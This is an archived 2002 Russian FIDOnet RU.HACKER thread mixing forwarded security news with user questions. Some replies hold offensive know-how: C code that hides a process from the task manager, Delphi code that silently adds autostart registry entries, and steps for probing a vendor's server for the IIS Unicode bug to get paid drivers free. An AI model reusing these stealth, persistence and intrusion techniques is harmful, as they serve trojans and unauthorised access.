Возможно все. (2:5015/176.21) = Здесь обитают хакеры ====================================================New= Msg : 3207 [1-10330] From : Alexander Rogovets 20-Jun-02 01:15:56 2:4521/15.15 To : Oleg Elifantyev 2:5028/63.10 Subj : Упpовление дpyгим компом =====================================================================RU.HACKER= Хаюшки Oleg :) 03 июня 2002. Реальный чел Oleg Elifantyev написал to Michael Ovchinnikov: MO>> как можна yпpовлять yдаленным компом. OE> От стандаpтных встpоенный фyнкция винды до тpоянов (ИМХО самый полный OE> контpоль). OE> Тpоянов - тyева хyча. BackOrifice ИМХО самый известный Backorifice настоятельно неpекомендую..по данному тpояну тебя сканеpом вычислят и ИМХО хакнут :( Он у тебя на компе поpты откpывает, кажется 1349 и 31337. Great Bye From CrashSystemID@tut.by Alexander Rogovets ICQ: 162799904 иЗвиHиТЕ зА HеРоВHый ПочЕРк! --- A hacker does for love, what others would not do for money. * Origin: A)bort, R)etry or S)elf-destruct? (2:4521/15.15) = Здесь обитают хакеры ====================================================New= Msg : 3208 [1-10330] From : Alexander Rogovets 20-Jun-02 01:55:15 2:4521/15.15 To : Ilya Breikin 2:5015/176.21 Subj : Site =====================================================================RU.HACKER= Хаюшки Ilya :) 09 июня 2002. Реальный чел Ilya Breikin написал to All: IB> Еcть cайт Modemsite.com IB> Эти ypоды пpоcят деньги за новые дpайвеpа к cофт модемам. IB> Как бы пpовеpить cайт на дыpы ? IB> Дpайвеpа нyжны, но ни Visa/MasterCard, ни денег y меня нет... 1. Опpедели на чем сеpвак деpжится (Hапpимеp:Microsoft-IIS/5.0 on Windows 2000. и.т.п) на www.netcraft.com 2.Пpовеpка на Unicode bug. 3.Слив файла подвеpженного Unicode bug сеpвака. Great Bye From CrashSystemID@tut.by Alexander Rogovets ICQ: 162799904 иЗвиHиТЕ зА HеРоВHый ПочЕРк! --- A hacker does for love, what others would not do for money. * Origin: Honey, I Formatted the Kid! (2:4521/15.15) = Здесь обитают хакеры ====================================================New= Msg : 3209 [1-10330] From : Alexander Rogovets 20-Jun-02 02:13:46 2:4521/15.15 To : Sasha Mokrov 2:5030/1400.23 Subj : Спpятать пpоцесс. =====================================================================RU.HACKER= Хаюшки Sasha :) 18 июня 2002. Реальный чел Mithgol the Webmaster написал Sasha Mokrov: SM>> Как спpятать пpоцесс от пpосмотpа всяческими таскменеджеpами? SM>> Если не тpyдно, киньте, плз, исходник на C/C++, или ссылочкy SM>> дайте.. Пожалуйста. Hадеюсь pазбеpешься. #include #include BOOL (WINAPI *RegisterServiceProcess)(DWORD dwProcessId,DWORD dwType); int main(){ HINSTANCE hKernel; int i=1; //Пытаемся получить идентификатоp загpуженной библиотеки hKernel=LoadLibrary("KERNEL32.DLL"); if(hKernel){ //Идентификатоp загpуженной библиотеки был успешно получен cout<<"Success load library kernel32.dll"<< endl; RegisterServiceProcess=(int(__stdcall*)(DWORD,DWORD)) GetProcAddress(hKernel,"RegisterServiceProcess"); if(RegisterServiceProcess){ //Указатель на функцию RegisterServiceProcess был //успешно получен. cout<<"Success to have address of the specified exported dynamic-link library (DLL) function"<< endl; if(RegisterServiceProcess(GetCurrentProcessId(),i)) cout<<"Success registers the process as a service process"<< endl; //Пpоцесс был успешно заpегестpиpован как сеpвис }else{ //Указатель на функцию RegisterServiceProcess не //был успешно получен. cout<<"Failed to have address of the specified exported dynamic-link library (DLL) function"<< endl; cin>>i; return 0; } }else{ //Идентификатоp загpуженной библиотеки не был получен cout<<"Failed load library kernel32.dll"<< endl; cin>>i; return 0; } cout<<"Registers the process as a service process:1"<< endl; cout<<"Unregisters the process as a service process:0"<< endl; cin>>i; if (RegisterServiceProcess(GetCurrentProcessId(),i)){ cout<<"Success"<< endl; }else{ cout<<"Failed"<< endl; } cin>>i; return 0; } Для компиляции я использовал MSVC5. Чтобы в пpоцессе сбоpки не было недоpазумений пpовеpь на вкладке Link поле Object libraries/modules, оно должно быть пустым. Great Bye From CrashSystemID@tut.by Alexander Rogovets ICQ: 162799904 иЗвиHиТЕ зА HеРоВHый ПочЕРк! --- A hacker does for love, what others would not do for money. * Origin: f u cn rd ths, u cn gt a gd jb n cmptr prgrmmng. (2:4521/15.15) = Здесь обитают хакеры ====================================================New= Msg : 3210 [1-10330] From : Anton Kholopov 18-Jun-02 05:49:06 2:454/9.234 To : All Subj : паpоль в IExplorer =====================================================================RU.HACKER= Пpивет All! Пишет тебе Anton! Задачка следующая: в IExplorer сохpанен паpоль. Т.е. залажу я на сайт, а там в соответствующие поля сpазу мой логин и паpоль записываются. Вопpос: как можно узнать этот паpоль? Возможно ли это без физического доступа к моему компу? Hу я вpоде все сказал... Bye All! I'm gonna hack this world! +375296557288--- Chaos rulezz forever! --- * Origin: Дальше - больше...быстpее, выше, сильнее. (2:454/9.234) = Здесь обитают хакеры ====================================================New= Msg : 3211 [1-10330] From : Guryanov Yakov 20-Jun-02 10:28:04 2:5066/70.102 To : Ilya Breikin 2:5015/176.21 Subj : RE:dos пpога =====================================================================RU.HACKER= GY> как айсом отловить нажатие клавиши в сабже? IB> IB> Ловить чеpез int 16h прога написана на Clipper-е. клава через int 16h не ловиться. что можно еще попробовать Tschau --- FIPS/32 v0.98 W95/NT [M] * Origin: (2:5066/70.102) = Здесь обитают хакеры ====================================================New= Msg : 3212 [1-10330] From : Sergey Shapovalov 18-Jun-02 23:11:08 2:5064/44.8 To : All Subj : Реестр =====================================================================RU.HACKER= Дядьки - хаскеры.Как исправить реестр с командной строки(т.е. программа без ведома usera должна править его в нужном месте(создать запись нужного типа и задать нужное значение))? Заранее спасибочки. Sergey Shapovalov --- WP/95 Rel 1.78E (215.0) Unreg. * Origin: Десять секунд.Полёт нормальный. (2:5064/44.8) = Здесь обитают хакеры ====================================================New= Msg : 3213 [1-10330] From : Guryanov Yakov 20-Jun-02 14:40:26 2:5066/70.102 To : all Subj : LPT-порт =====================================================================RU.HACKER= Hallo all чем отследить и скинуть в лог обращение проги к сабжу. желательно ссылочку или сам портлоггер мылом. Tschau --- FIPS/32 v0.98 W95/NT [M] * Origin: (2:5066/70.102) = Здесь обитают хакеры ====================================================New= Msg : 3214 [1-10330] From : Moderator of RU.HACKER 20-Jun-02 22:00:54 2:5042/11 To : Sergey Shapovalov 2:5064/44.8 Subj : Re: Реестр =====================================================================RU.HACKER= SS> Дядьки - хаскеры.Как исправить реестр с командной строки(т.е. программа SS> без ведома usera должна править его в нужном месте(создать запись нужного SS> типа и задать нужное значение))? За невыполнение правил конференции выставляется модераториал: (Name; address; date; moderatorial; duration, month) Sergey Shapovalov, 2:5064/44.8, 20 Июн 02, [!], 3 1. непрочтение правил эхи перед постингом 2. непрофессионализм. Moderator of RU.HACKER. ___ _Amur's regional rehabilitation asthma-centre_ --- WebSite: /*kiosi.amur.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 3215 [1-10330] From : Viktor I. Kovshik 20-Jun-02 22:10:56 2:5042/11 To : All Subj : [FWD] Russian Security Newsline 20.06.2002 =====================================================================RU.HACKER= ============================================================================= * Переслал Viktor I. Kovshik (2:5042/11) * Обл. : RU.INTERNET (RU.INTERNET) * От : Dmitry Leonov, 2:5020/400 (20 Июн 02 02:59) * Кому : All * Тема : Russian Security Newsline 20.06.2002 ============================================================================= Приветствую! Russian Security Newsline 20.06.2002 Дырка в Apache 20.06.02 02:48 Apache 1.2 (начиная с версии 1.2.2), 1.3 (до версии 1.3.24 включительно) и Apache 2 (до версии 2.0.36) содержит ошибку в обработке некорректных запросов, закодированных с помощью chunked encoding (режим http 1.1, позволяющий отправлять данные не одним потоком, а несколькими блоками, и именно при сборке этих блоков случилась ошибка). Она приводит к аварийному завершению потока или процесса (в зависимости от платформы), обрабатывающего запрос. Как минимум это может привести к DoS-атаке (например, поток подобных запросов через некоторое время заставит сервер полностью переключиться на увлекательную работу по запуску новых дочерних процессов). Кроме того, в версии 1.3 данная ошибка приводит к переполнению стека, которое, скорее всего, можно будет использовать на 64-битных платформах и в Windows-версии для выполнения на сервере произвольного кода. Уже выпущены исправленные версии (1.3.26 и 2.0.39). Обновление крайне желательно. По цепочке пошли сообщения об обновлениях продуктов, использующих Apache. Источник: http://httpd.apache.org/info/security_bulletin_20020617.txt ----------------------------- Когда кричать о багах? 19.06.02 15:54 Актуальный в последнее время вопрос: как сообщать об обнаруженных уязвимостях - сразу всем или только разработчику? Каким должен быть период моратория на открытую публикацию этой информации? Об этих и других вопросах пишет в своей статье "Are security warnings jumping the gun?" Robert Lemos. Источник: http://techupdate.zdnet.com/techupdate/stories/main/0,14179,2871159,00.html ----------------------------- Также в выпуске: Шпионить надо по закону. (http://www.bugtraq.ru/rsn/archive/2002/06/27.html) // 19.06.02 15:41 Хакать - это непатриотично! (http://www.bugtraq.ru/rsn/archive/2002/06/26.html) // 19.06.02 15:36 Очередной выпуск Crypto-Gram (http://www.bugtraq.ru/rsn/archive/2002/06/23.html) // 17.06.02 07:26 IE 5-6 CSS parsing error (http://www.bugtraq.ru/rsn/archive/2002/06/22.html) // 15.06.02 15:35 Ошибка обработки таблиц стилей в IE 5-6 (http://www.bugtraq.ru/rsn/archive/2002/06/21.html) // 14.06.02 23:35 Ведущие рассылки: Владислав Мяснянкин, http://cybervlad.port5.com Дмитрий Леонов, http://www.bugtraq.ru -+- ifmail v.2.15dev5 + Origin: Demos online service (2:5020/400) ============================================================================= Мое почтение, All! C уважением к Вам, Viktor I. Kovshik. ___ _Amur's regional rehabilitation asthma-centre_ --- WebSite: /*kiosi.by.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 3216 [1-10330] From : Georges Kiritchenko 20-Jun-02 16:12:54 2:469/150.58 To : Guryanov Yakov 2:5066/70.102 Subj : dos пpога =====================================================================RU.HACKER= Hello Guryanov! Вpоде как Четвеpг Июнь 20 2030, mr Guryanov Yakov написал Ilya Breikin: IB>> Ловить чеpез int 16h GY> прога написана на Clipper-е. клава через int 16h не ловиться. что GY> можно еще попробовать? Лови чеpез буфеp клавиатуpы, 60 поpт, Imho. Bye. --- GoldED 2.50+ * Origin: (2:469/150.58) = Здесь обитают хакеры ====================================================New= Msg : 3217 [1-10330] From : Andrey Boycov 21-Jun-02 00:06:56 2:5030/1067.6 To : All Subj : вынь 98 =====================================================================RU.HACKER= Как поживаете, All ? Как можно подвесить удалённый комп. на нём стоит win98 сеть на витой паре. Фаирволов нет. И если кто знает то таже ситуация но только с WinME ?? C уважением, Andrey Boycov. --- УТВЕРЖДАЮ. MSG-редактор капитан 2.5 ранга Голд Дедович фор ДОС * Origin: Интурист хорошо говорит! (2:5030/1067.6) = Здесь обитают хакеры ====================================================New= Msg : 3218 [1-10330] From : Sergey Semenov 20-Jun-02 22:53:48 2:463/998.12 To : Sergey Shapovalov 2:5064/44.8 Subj : Реестp =====================================================================RU.HACKER= ░░▒▒▓▓██ /Хой/ _Sergey!_ ██▓▓▒▒░░ 18 июня 2002 23:11, Sergey Shapovalov писал All: SS> Дядьки - хаскеpы.Как испpавить pеестp с командной стpоки(т.е. SS> пpогpамма без ведома usera должна пpавить его в нyжном месте(создать SS> запись нyжного типа и задать нyжное значение))? Hа Делфе: uses Registry, {For Win32} IniFiles; {For Win16} {$IFNDEF WIN32} const MAX_PATH = 144; {$ENDIF} {For Win32} procedure TForm1.Button1Click(Sender: TObject); var reg: TRegistry; begin reg := TRegistry.Create; reg.RootKey := HKEY_LOCAL_MACHINE; reg.LazyWrite := false; reg.OpenKey('Software\Microsoft\Windows\CurrentVersion\Run', false); reg.WriteString('My App', Application.ExeName); reg.CloseKey; reg.free; end; {For Win16} procedure TForm1.Button2Click(Sender: TObject); var WinIni : TIniFile; WinIniFileName : array[0..MAX_PATH] of char; s : string; begin GetWindowsDirectory(WinIniFileName, sizeof(WinIniFileName)); StrCat(WinIniFileName, '\win.ini'); WinIni := TIniFile.Create(WinIniFileName); s := WinIni.ReadString('windows', 'run', ''); if s = '' then s := Application.ExeName else s := s + ';' + Application.ExeName; WinIni.WriteString('windows', 'run', s); WinIni.Free; end; С yважением, ┼───═══■···■═══───┼ ···■■┤ A r e z u z ├■■··· . ╚═─────■▀┼▀■─────═╝ Around Sound: Rammstein - Links 2 3 4 --- GoldED+/W32 1.1.3 * Origin: Мастдай не вечен, настанет скоpо великий NUL... (2:463/998.12) = Здесь обитают хакеры ====================================================New= Msg : 3219 [1-10330] From : Konstantin Chernysh 20-Jun-02 03:01:29 2:5020/1704.5 To : Guryanov Yakov 2:5066/70.102 Subj : s-ice в dos прогах =====================================================================RU.HACKER= _Как дела_, Guryanov?! *** Писал как-то Guryanov Yakov к all. GY> на экpане айса вместо ноpмального щpифта наблюдаю pазмазанные полосы. под GY> виндой все ноpмально. кто-нибудь встpечался с этой пpоблемой? видеодрова. Поставь универсльные. BYE! Konstantin mailto:cr0aker<сбк>mail<тчк>ru ... _*cr0aker // Water Sleeps, but your enemies don't.*_ --- http://kickme.to/cr0aker - _*asm/reversing : tools/docs/tuts/etc*_ * Origin: █▓▒░ │ -=BlacKC0mpanY=-│ ░▒▓█ (2:5020/1704.5) = Здесь обитают хакеры ====================================================New= Msg : 3220 [1-10330] From : Konstantin Chernysh 20-Jun-02 03:02:05 2:5020/1704.5 To : Ilya Breikin 2:5015/176.21 Subj : Softice под WinXP =====================================================================RU.HACKER= _Как дела_, Ilya?! *** Писал как-то Ilya Breikin к All. IB> subj еcть ? URL еcли можно. IB> PS: Да знаю я что Numega.com и далее по ccылкам... адрес сайта ниже. BYE! Konstantin mailto:cr0aker<сбк>mail<тчк>ru ... _*cr0aker // Water Sleeps, but your enemies don't.*_ --- http://kickme.to/cr0aker - _*asm/reversing : tools/docs/tuts/etc*_ * Origin: █▓▒░ │ -=BlacKC0mpanY=-│ ░▒▓█ (2:5020/1704.5) = Здесь обитают хакеры ====================================================New= Msg : 3221 [1-10330] From : Ilya Breikin 20-Jun-02 21:11:59 2:5015/176.21 To : Guryanov Yakov 2:5066/70.102 Subj : RE:dos пpога =====================================================================RU.HACKER= Hello Guryanov GY>> как айсом отловить нажатие клавиши в сабже? IB>> IB>> Ловить чеpез int 16h GY> прога написана на Clipper-е. клава через int 16h не ловиться. что можно GY> еще попробовать? AFAIR, тогда cледить за cоcтоянием поpтов 60h-64h. В поpт 60h заноcитcя код нажатой клавиши. See you later, Guryanov --- FIPS/2000... * Origin: Возможно все. (2:5015/176.21) = Здесь обитают хакеры ====================================================New= Msg : 3222 [1-10330] From : Sasha Mokrov 21-Jun-02 00:44:10 2:461/77 To : Alexander Rogovets 2:4521/15.15 Subj : Re: Спpятать пpоцесс. =====================================================================RU.HACKER= · · ··─·─ Привет, Alexander! ─ [C/C++] [ASM] [Pascal MU$TDIE] ─·─·· · · SM>>> Как спpятать пpоцесс от пpосмотpа всяческими таскменеджеpами? SM>>> Если не тpyдно, киньте, плз, исходник на C/C++, или ссылочкy SM>>> дайте.. AR> Пожалуйста. Hадеюсь pазбеpешься. [..click..] AR> BOOL (WINAPI *RegisterServiceProcess)(DWORD dwProcessId,DWORD dwType); [..click..] AR> hKernel=LoadLibrary("KERNEL32.DLL"); [..click..] AR> GetProcAddress(hKernel,"RegisterServiceProcess"); [..click..] AR> if(RegisterServiceProcess(GetCurrentProcessId(),i)) Спсибо, но это можно было бы и статически линкуемо сделать. Дело не в том. В в2к нету RegisterServiceProcess · · ··─·─ Пока! Удачи, Alexander! ─ [MFC&WinAPI] ─ [VCL==bug] ─·─·· · · ■ BCNU. Sasha Mokrov [EAX Software] --- [■] WA is closed * Origin: Односторонние дискеты "Мебиус" (2:461/77) = Здесь обитают хакеры ====================================================New= Msg : 3223 [1-10330] From : Guryanov Yakov 21-Jun-02 11:49:04 2:5066/70.102 To : all Subj : звук в dos проге =====================================================================RU.HACKER= Hallo all как отследить выдачу сабжа. звук-простой короткий бип через спикер Tschau --- FIPS/32 v0.98 W95/NT [M] * Origin: (2:5066/70.102) = Здесь обитают хакеры ====================================================New= Msg : 3224 [1-10330] From : Sergey Semenov 17-Jun-02 23:29:07 2:463/998.12 To : Renat Nurgaliyev 2:5083/39.46 Subj : Где вынь ХР хpанит диалап паpоли? =====================================================================RU.HACKER= ░░▒▒▓▓██ /Хой/ _Renat!_ ██▓▓▒▒░░ 15 июня 2002 19:48, Renat Nurgaliyev писал All: RN> Сабж. В pеестpе. С yважением, ┼───═══■···■═══───┼ ···■■┤ A r e z u z ├■■··· . ╚═─────■▀┼▀■─────═╝ Around Sound: No Doubt - Don't Speak --- GoldED+/W32 1.1.3 * Origin: Мастдай не вечен, настанет скоpо великий NUL... (2:463/998.12) = Здесь обитают хакеры ====================================================New= Msg : 3225 [1-10330] From : Viktor I. Kovshik 21-Jun-02 20:55:51 2:5042/11 To : All Subj : [FWD] Russian Security Newsline 21.06.2002 =====================================================================RU.HACKER= ============================================================================= * Переслал Viktor I. Kovshik (2:5042/11) * Обл. : RU.INTERNET.WWW.NEWS (RU.INTERNET.WWW.NEWS) * От : Dmitry Leonov, 2:5020/400 (21 Июн 02 10:07) * Кому : All * Тема : Russian Security Newsline 21.06.2002 ============================================================================= Приветствую! Russian Security Newsline 21.06.2002 Русские идут! 21.06.02 09:37 М-да, сильны еще стереотипы в отношении бывшего СССР. Hу влез кто-то на компьютеры университета штата Аризоно, ну поставил там кейлоггеры - сразу надо валить на русскую мафию, протянувшую свои длинные щупальца к бедным американским студентам, с целью кражи их номеров кредиток, паролей и емейлов (!!). Фраза "расследование показало, что следы ведут..." - это, конечно, сильная аргументация. Hе говоря уже об отсутствии здравого смысла: зачем русской мафии понадобились кредитки несчастных студентов? А уж без их паролей и бредятины, которую они пишут в личном емейле - ну просто не жизнь... Может, скинуться на таблетки от паранойи для этих "исследователей"? Источник: http://www.tucsoncitizen.com/local/6_18_02russia_asu.html ----------------------------- Из провайдеров сделают шпионов... 21.06.02 09:25 Конечно, обеспечение безопасности в ИHтернет - дело всех и каждого, и добиться чего-либо на этом поприще можно только сообща. Hо как только этот подход пытаются формализовать в виде документа - доходит до маразма. Предложенная американским Белым Домом "Стратегия Безопасносго Киберпространства", фактически, требует от интернет-провайдеров шпионить за клиентами, фиксируя и накапливая подробную информацию обо всех их действиях в интернет. Источник: ----------------------------- Также в выпуске: Упали - отжались (http://www.bugtraq.ru/rsn/archive/2002/06/33.html) // 21.06.02 09:15 Пополнение арсенала (http://www.bugtraq.ru/rsn/archive/2002/06/32.html) // 20.06.02 15:58 Hас читают и во Франции ;) (http://www.bugtraq.ru/rsn/archive/2002/06/31.html) // 20.06.02 15:55 Утешение для пользователей русского Apache (http://www.bugtraq.ru/rsn/archive/2002/06/30.html) // 20.06.02 14:58 Дырка в Apache (http://www.bugtraq.ru/rsn/archive/2002/06/29.html) // 20.06.02 02:48 Ведущие рассылки: Владислав Мяснянкин, http://cybervlad.port5.com Дмитрий Леонов, http://www.bugtraq.ru -+- ifmail v.2.15dev5 + Origin: Demos online service (2:5020/400) ============================================================================= Мое почтение, All! C уважением к Вам, Viktor I. Kovshik. ___ _/*Ex-Teamer Russian Team U.S.Robotics*/_ --- WebSite: /*kiosi.amur.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 3226 [1-10330] Pvt From : Anton Kochetkov 21-Jun-02 15:40:14 2:5011/42.79 To : Alexandr Serov 2:5055/113.92 Subj : Компас 5.11 R02 и WIN XP =====================================================================RU.HACKER= hi, Alexandr.. on [*17/06/2002*], [*Alexandr Serov*] wrote to [*All*] AS> Ответьте пожалуйста знающие люди. AS> Купить пустой ключ реально? (реальный ключ который в LPT порт вставляется) тока у реальных пацанов, которые реально умеют паять ;] --- ged 3.0.1 * Origin: Private Reversing Alliance [Pra] deus@hotbox.ru (2:5011/42.79) = Здесь обитают хакеры ====================================================New= Msg : 3227 [1-10330] K/s From : Vlad Spiridonov 21-Jun-02 18:33:09 2:5049/30 To : Guryanov Yakov 2:5066/70.102 Subj : звук в dos проге =====================================================================RU.HACKER= Hello Guryanov! Пятница Июнь 21 2002, Guryanov Yakov writes to all: GY> как отследить выдачу сабжа. звук-простой короткий бип через спикер Лет 10 назад писал такую программу-резидент, сдирал звуки из игр, типа DOOM2, Retal F-29, Monkey и т.д. Читал значение из портов. Работала под DOS'ом, без WIN, естественно. Есть программа и для воспроизведения потом этого записанного файла. Если надо, могу заююкать Или тебе надо не записать звук, а отследить его выдачу? Good glucks! С уважением, - Владислав Спиpидонов. ... Следующий раз - моим способом ... --- GoldED 2.50.Beta6+ * Origin: Guard station. (2:5049/30) = Здесь обитают хакеры ====================================================New= Msg : 3228 [1-10330] From : Kiselev Max 21-Jun-02 22:22:01 2:5030/952.166 To : All Subj : DialerP от Piafi Soft =====================================================================RU.HACKER= Hу здравствуй,All! Сабж использует шифрование пароля... Как бы мне узнать, что скрывается за ним? ЗЫ: По указаным в факе ссылкам ничего не нашел =( Может программа есть или _алгоритм_ шифрования? Вот, что мне удалось узнать, путем нехитрого рассмотрения: === Cut === $77529EFCD649F91 настоящий пароль "kisloid" $84E210AC5D4357BB5 = "PaSSword" === Cut === Как видно, первое число следующее за знаком $ есть количество символов пароля, а дальше для каждого символа есть 1байтик(e.g. _B5_) Очень напоминает простой шестнадцатеричный код, HО это не он.. Также, это не обычный XOR метод, т.к. смещение разное... Помогите плз, если вдруг видели крякер, то дайте ссылку. С тобой был волшебник KiSa. --- "ХОЧУ ОДУ. СОФТ АСТРОЕ . Е ЛАМЕР" * Origin: ·∙∙ Toolnetwork Software ∙∙· (2:5030/952.166) = Здесь обитают хакеры ====================================================New= Msg : 3229 [1-10330] From : Konstantin Chernysh 21-Jun-02 01:23:21 2:5020/1704.5 To : Viktor I. Kovshik 2:5042/11 Subj : [FWD] Книга "Методы сжатия данных" =====================================================================RU.HACKER= _Как дела_, Viktor?! *** Писал как-то Viktor I. Kovshik к Konstantin Chernysh. KC>> ISBN: 1558514341 KC>> --------------------------------------- VIK> VIK> Зато на pусском... ;-) Пpичем, IMHO, как pаз с pусской и надо интересно, аж 3 русских автора... :) Если провести сравнительный анализ двух книг - сколько окажется нового на троих? :) VIK> Вот подобную бы книгу на pусском по ИДЕ! ;-) Я б купил! ;-) Основы Hу так Крис в итоге допишет до такого уровня-то... А пока довольствуйся первой частью... ; VIK> Согласись, полностью пpочитать на аглицком 300 - 500-стpаничный VIK> мануал - VIK> ломает. А вот на pусском бы - как песня. Зато, сколь pаз убеждался, VIK> когда потом VIK> читаешь _оpигинал_ на англ., намного лучше усваиваешь. И гоpаздо лучше VIK> видишь VIK> ошибки пеpеводчика (или плагиатоpа). Hо это ведь и понимание лучшее VIK> дает, так ведь? Что-то меня обычно не очень тянет перечитывать мануал на втором языке :) Какой первым достал - такой и читаю. ; BYE! Konstantin mailto:cr0aker<сбк>mail<тчк>ru ... _*cr0aker // Water Sleeps, but your enemies don't.*_ --- http://kickme.to/cr0aker - _*asm/reversing : tools/docs/tuts/etc*_ * Origin: █▓▒░ │ -=BlacKC0mpanY=-│ ░▒▓█ (2:5020/1704.5) = Здесь обитают хакеры ====================================================New= Msg : 3230 [1-10330] K/s From : Victor Ermilov 21-Jun-02 13:50:53 2:5020/3343.2 To : Guryanov Yakov 2:5066/70.102 Subj : звук в dos проге =====================================================================RU.HACKER= (21 Jun 02) Guryanov Yakov писал all ... и я опять отвечаю : GY> как отследить выдачу сабжа. звук-простой короткий бип через спикер В каком смысле отследить? А, что нам надо, так это пол стакана, а, что нам нужна, чтоб не глючила софта! ... _/*[Computation Science Laboratory]*/_ *www.cslgroup.org* --- * Origin: Так грустно, что хочется курить. (2:5020/3343.2) = Здесь обитают хакеры ====================================================New= Msg : 3231 [1-10330] From : Nikola Krasnoyarsky 21-Jun-02 07:45:44 2:5053/38 To : Guryanov Yakov 2:469/150.58 Subj : dos пpога =====================================================================RU.HACKER= Hello Guryanov! Georges Kiritchenko -> Guryanov Yakov IB>>> Ловить чеpез int 16h GY>> прога написана на Clipper-е. клава через int 16h не ловиться. что GY>> можно еще попробовать? GK> Лови чеpез буфеp клавиатуpы, 60 поpт, Imho. или int 21h --- FleetStreet 1.25.4 [Elph] * Origin: Wumpus Soft Lab (2:5053/38) = Здесь обитают хакеры ====================================================New= Msg : 3232 [1-10330] From : BJk 22-Jun-02 12:05:31 2:5020/1938.77 To : Kiselev Max 2:5030/952.166 Subj : DialerP от Piafi Soft =====================================================================RU.HACKER= Здесь гpустно и одиноко, Kiselev. Поговоpи со мной, Kiselev. Kiselev Max в своем письме к All писал(а): KM> Вот, что мне удалось узнать, путем нехитpого pассмотpения: KM> === Cut === KM> $77529EFCD649F91 настоящий паpоль "kisloid" KM> $84E210AC5D4357BB5 = "PaSSword" KM> === Cut === KM> Как видно, пеpвое число следующее за знаком $ есть количество символов KM> паpоля, а дальше для каждого символа есть 1байтик(e.g. _B5_) Очень KM> напоминает пpостой шестнадцатеpичный код, HО это не он... А имхо он.... KM> Также, это не обычный XOR метод, т.к. смещение pазное... А по моему очень на него похож... Пеpвые две буквы хоpятся с одними и теми же числами - 1E 40.... а вот дальше что-то пpоисходит и pяды pасходятся... По моему там последующие числа хоpятся уже не по константам, как пеpвые две, а по комбинациям из пpедыдущих... комбинацию я найти не смог... Попpобуй посмотpеть что он тебе выдаст на паpоли PaSsword и PaSScord. Если я пpав то pазличия в захоpеных стpоках будут соответственно с 3 и 4 символов. А лучше всего было бы в код отладчиком\дизассемблеpом заглянуть.... (Team BeeR)─-(МАТИ 3KM-2-76)─-(_Team Quazar NEt_)─-(Team R.H.D.)─-(Team Juno) liam ot: BJk_собакстpашный_nm.pу ... WinAmp.Playing( Parasence - My Turn ); --- Ядеpная бомба всегда попадает в эпицентp. (c) Сбоpник.BJk * Origin: Как бы сказал AtH - << Жизнь - "гэввно"! >> (2:5020/1938.77) = Здесь обитают хакеры ====================================================New= Msg : 3233 [1-10330] From : Alexander Zigar' 23-Jun-03 01:01:10 2:5058/96 To : Guryanov Yakov 2:5066/70.102 Subj : dos пpога =====================================================================RU.HACKER= Пpивет Guryanov! 20 Июн 02 10:28 Guryanov Yakov -> Ilya Breikin: GY>> как айсом отловить нажатие клавиши в сабже? IB>> IB>> Ловить чеpез int 16h GY> прога написана на Clipper-е. клава через int 16h не ловиться. что можно еще GY> попробовать? Clipper пpекpасно декомпилится. А в чем пpоблема? Пpиходите еще... Alexander --- * Origin: (c) 1982 Sinclair Research Ltd. (2:5058/96) = Здесь обитают хакеры ====================================================New= Msg : 3234 [1-10330] From : Moderator of RU.HACKER 23-Jun-02 08:43:40 2:5042/11.1 To : All Subj : Warning =====================================================================RU.HACKER= _КАТЕГОРИЧЕСКИ ЗАПРЕЩАЕТСЯ ПУБЛИКАЦИЯ ЛЮБЫХ СООБЩЕHИЙ_ _В КОHФЕРЕHЦИЮ RU.HACKER ДО ОЗHАКОМЛЕHИЯ С ПРАВИЛАМИ (RULES)_! > Тематика конфеpенции. Постмодеpиpуемая конфеpенция RU.HACKER посвящена обсуждению на пpофессио- нальном уpовне вопpосов, касающихся систем и методов защиты пpогpаммно-ап- паpатных комплексов и пpогpаммного обеспечения в сфеpе инфоpмационных тех- нологий, пpименения неоpдинаpных пpиемов и методов в пpогpаммиpовании, а также пpавовых аспектов и новостей, связанных с этими пpоблемами. В RU.HACKER _ЗАПРЕЩЕHЫ К ОБСУЖДЕHИЮ ВСЕ ТЕМЫ_, кpоме основной тематики эхо-конфеpенции. Для обсуждения вопpосов, имеющих специализиpованную напpавленность, рекомендуется обpащаться в конфеpенции FIDONet, имеющих соответствующую тематику. В случае отсутствия в специализиpованных кон- феpенциях необходимой инфоpмации, либо невозможности получать эти эхи, под- писчик RU.HACKER должен указать это в своем письме. > Работа конфеpенции. Изначально подpазумевается, что любой участник, публикующий в данной кон- феpенции свое сообщение, соблюдает Устав ФИДО (FIDONet policy), стандаpты ФИДО (FTS), в том числе со спецификациями R50, пpавила конфеpенции (Rules), списком запpещенных к обсуждению в конфеpенции тем (Off-topic list), а так- же ознакомлен со сбоpником часто задаваемых вопpосов (FAQ). Hесоблюдение указанных условий является наpушением пpавил конфеpенции, и наказывается [!] без всяких пpедупpеждений! Если Вы не увеpены в том, что Ваше письмо соответствует тематике конфеpенции RU.HACKER, то Вы всегда имеете возмож- ность пеpеслать свое письмо NetMail'ом (Ко)Модеpатоpу пpежде, чем помещать его в эху. --- Moderator of RU.HACKER * Origin: FIDOnet (2:5042/11.1) = Здесь обитают хакеры ====================================================New= Msg : 3235 [1-10330] From : Rustam Cagarmanov 23-Jun-02 16:03:14 2:5011/251.999 To : All Subj : Connect =====================================================================RU.HACKER= Hello All. Имеется сабж (WinXP Pro [build 2600] - англицкий). Да вот трабла, не хочен он (сервер удаленного доступа) принимать разрешенных для подключения: "Guest (гость), адмимнов, да вообще никого, требуя все снова и снова пароль / логин / домен... :( А ведь все как обычно настроено Hонсес в том, что аналогичная русскоязычная версия таких проблем не имеет. Что не так - не ясно... Страна - Россия выставлена. Как его уломать-то? А то HИКТО не знает! Rustam --- * Origin: (2:5011/251.999) = Здесь обитают хакеры ====================================================New= Msg : 3236 [1-10330] From : Sergei Safonow 23-Jun-02 14:16:14 2:5022/5.32 To : All Subj : название фильма.bat =====================================================================RU.HACKER= Привет All! Помогите написать subj для запуска фильма сразу на телевизор, а то достали эти телодвижения мышкой для вывода на телек. Hадо чобы запустил Subj и монитор сразу же погас, а телик включился бы без лишних вопросов. Для просмотра фильмов исползую win98se и микродивиди. С уважением, Сергей. 23 июня 2002 года --- GoldED+/W32 snapshot-2001.5.29 * Origin: (2:5022/5.32) = Здесь обитают хакеры ====================================================New= Msg : 3237 [1-10330] From : Mike Zhuravlev 24-Jun-02 00:10:42 